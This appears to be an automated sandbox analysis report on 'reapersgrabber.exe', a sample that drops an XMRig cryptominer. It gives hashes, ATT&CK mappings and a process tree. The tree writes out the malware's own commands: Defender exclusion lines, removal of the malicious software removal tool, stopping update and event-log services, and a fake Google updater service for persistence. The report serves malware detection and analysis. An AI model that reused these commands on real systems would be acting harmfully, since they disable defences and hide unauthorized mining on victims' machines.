Analysis
-
max time kernel
77s -
max time network
79s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
22/08/2024, 20:23
Static task
static1
Behavioral task
behavioral1
Sample
REAPERSGRABBER/reapersgrabber.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
REAPERSGRABBER/reapersgrabber.exe
Resource
win10v2004-20240802-en
General
-
Target
REAPERSGRABBER/reapersgrabber.exe
-
Size
6.6MB
-
MD5
a8771e7e3c8e5487bfe7cc420e45805d
-
SHA1
083dd0dafd61c78d3fc385d6d6d20274c4fbc52f
-
SHA256
c877050dc8ce4a7abef92b2bfb49b5dc9da50edc0da31f27c7389d2aed2919e5
-
SHA512
6029d31a8beb0a8f696adb91ca33c393e37ca5020abc6eb7819b8d2a129c32e1ed996c06f1bda0dfc1a0db697f176b8c8953302ff51800013d9cd72d68247d0d
-
SSDEEP
196608:2P9X2sC/cRUfNyW6yLr217ohh0vQFPOoh:2hC0+N9qVxvQIo
Malware Config
Signatures
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/5032-136-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-140-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-141-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-138-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-139-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-135-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-142-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-143-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-144-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-145-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-146-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/5032-160-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1044 powershell.exe 208 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts setup.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation reapersgrabber.exe -
Executes dropped EXE 3 IoCs
pid Process 3696 ReapersGrabber.exe 884 setup.exe 3132 updater.exe -
resource yara_rule behavioral2/memory/5032-130-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-133-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-134-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-136-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-140-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-141-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-138-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-139-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-135-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-132-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-131-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-142-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-143-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-144-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-145-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-146-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/5032-160-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 35 pastebin.com 36 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3748 powercfg.exe 2232 powercfg.exe 1456 powercfg.exe 4116 powercfg.exe 3740 powercfg.exe 2824 powercfg.exe 320 powercfg.exe 2276 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe setup.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3132 set thread context of 1252 3132 updater.exe 150 PID 3132 set thread context of 5032 3132 updater.exe 154 -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4712 sc.exe 4104 sc.exe 2380 sc.exe 1596 sc.exe 3304 sc.exe 760 sc.exe 3580 sc.exe 1652 sc.exe 4820 sc.exe 1540 sc.exe 3724 sc.exe 2316 sc.exe 3084 sc.exe 5052 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reapersgrabber.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ReapersGrabber.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Modifies data under HKEY_USERS 50 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5068 powershell.exe 5068 powershell.exe 884 setup.exe 1044 powershell.exe 1044 powershell.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 884 setup.exe 3132 updater.exe 208 powershell.exe 208 powershell.exe 3132 updater.exe 3132 updater.exe 3132 updater.exe 3132 updater.exe 3132 updater.exe 3132 updater.exe 3132 updater.exe 3132 updater.exe 3132 updater.exe 3132 updater.exe 3132 updater.exe 3132 updater.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe 5032 explorer.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 5068 powershell.exe Token: SeDebugPrivilege 1044 powershell.exe Token: SeShutdownPrivilege 1456 powercfg.exe Token: SeCreatePagefilePrivilege 1456 powercfg.exe Token: SeShutdownPrivilege 2824 powercfg.exe Token: SeCreatePagefilePrivilege 2824 powercfg.exe Token: SeShutdownPrivilege 3740 powercfg.exe Token: SeCreatePagefilePrivilege 3740 powercfg.exe Token: SeShutdownPrivilege 4116 powercfg.exe Token: SeCreatePagefilePrivilege 4116 powercfg.exe Token: SeDebugPrivilege 208 powershell.exe Token: SeLockMemoryPrivilege 5032 explorer.exe Token: SeShutdownPrivilege 2232 powercfg.exe Token: SeCreatePagefilePrivilege 2232 powercfg.exe Token: SeShutdownPrivilege 2276 powercfg.exe Token: SeCreatePagefilePrivilege 2276 powercfg.exe Token: SeShutdownPrivilege 320 powercfg.exe Token: SeCreatePagefilePrivilege 320 powercfg.exe Token: SeShutdownPrivilege 3748 powercfg.exe Token: SeCreatePagefilePrivilege 3748 powercfg.exe Token: SeDebugPrivilege 3372 taskmgr.exe Token: SeSystemProfilePrivilege 3372 taskmgr.exe Token: SeCreateGlobalPrivilege 3372 taskmgr.exe -
Suspicious use of FindShellTrayWindow 52 IoCs
pid Process 3696 ReapersGrabber.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe -
Suspicious use of SendNotifyMessage 51 IoCs
pid Process 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe 3372 taskmgr.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 4032 wrote to memory of 5068 4032 reapersgrabber.exe 85 PID 4032 wrote to memory of 5068 4032 reapersgrabber.exe 85 PID 4032 wrote to memory of 5068 4032 reapersgrabber.exe 85 PID 4032 wrote to memory of 3696 4032 reapersgrabber.exe 88 PID 4032 wrote to memory of 3696 4032 reapersgrabber.exe 88 PID 4032 wrote to memory of 3696 4032 reapersgrabber.exe 88 PID 4032 wrote to memory of 884 4032 reapersgrabber.exe 89 PID 4032 wrote to memory of 884 4032 reapersgrabber.exe 89 PID 2808 wrote to memory of 1148 2808 cmd.exe 107 PID 2808 wrote to memory of 1148 2808 cmd.exe 107 PID 4460 wrote to memory of 1752 4460 cmd.exe 138 PID 4460 wrote to memory of 1752 4460 cmd.exe 138 PID 3132 wrote to memory of 1252 3132 updater.exe 150 PID 3132 wrote to memory of 1252 3132 updater.exe 150 PID 3132 wrote to memory of 1252 3132 updater.exe 150 PID 3132 wrote to memory of 1252 3132 updater.exe 150 PID 3132 wrote to memory of 1252 3132 updater.exe 150 PID 3132 wrote to memory of 1252 3132 updater.exe 150 PID 3132 wrote to memory of 1252 3132 updater.exe 150 PID 3132 wrote to memory of 1252 3132 updater.exe 150 PID 3132 wrote to memory of 1252 3132 updater.exe 150 PID 3132 wrote to memory of 5032 3132 updater.exe 154 PID 3132 wrote to memory of 5032 3132 updater.exe 154 PID 3132 wrote to memory of 5032 3132 updater.exe 154 PID 3132 wrote to memory of 5032 3132 updater.exe 154 PID 3132 wrote to memory of 5032 3132 updater.exe 154
Processes
-
C:\Users\Admin\AppData\Local\Temp\REAPERSGRABBER\reapersgrabber.exe"C:\Users\Admin\AppData\Local\Temp\REAPERSGRABBER\reapersgrabber.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAawBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAdwBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAYwBwACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Users\Admin\AppData\Local\Temp\ReapersGrabber.exe"C:\Users\Admin\AppData\Local\Temp\ReapersGrabber.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:3696
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:884 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1148
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:3304
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:760
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:4820
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:3580
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:1652
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:4712
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"3⤵
- Launches sc.exe
PID:4104
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2380
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:1540
-
-
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1752
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1596
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2316
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3084
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5052
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3724
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1252
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1900
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3372
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Defense Evasion
Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
18KB
MD5c2383f3a2b8316322901dce161e16766
SHA181f393b0f30720e6cc7ab1f6a623597e72105c93
SHA25630e701a0d1d2b2c716dac0691a7d81b074d3f57dbdbdb00e04ec43ce5f7ccf2e
SHA512afcea56b3e758de6f9388e31c7d9b13d6310bd9a6518fa2e76862542c37ab18e3abc4e0002e92885cccd43ab55c3a8cd2faf159c1bcd0deb39a0c98d4bd9e134
-
Filesize
1.5MB
MD50ac146eea5afbf197168614f257b783e
SHA1afa3b961ab09e2685c32d558e3429c71bf43b195
SHA256da8ab91f378cb595d8a809aba371442d943f211d7c1497adccd5824be669d91b
SHA5129188b00e1170a3f0b2976b8787fb58927fb5b866af4628c105365b73869ec8197be7fae70fa9d2bd1a464ad95c278555476f1fd102a672b862fb4998505ee3e1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.1MB
MD5cc6be6cc21ca6263b2712d5f4f5c8cd5
SHA12f0fe6f8e6279b7bf44c22babf0dacc01a0c0d8e
SHA25603ea65b939174a81675352dbe889f1f6835eb119741f698b05d56073faeeed36
SHA512422b5d0fc740db845d6bbf465451a744e3a9d8878a0f86aedb65736c98610ecaebda5e93737e7c5b16c1f64aa765bacf1d104d61bfd042f1274d0d19ffb1a7d5
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62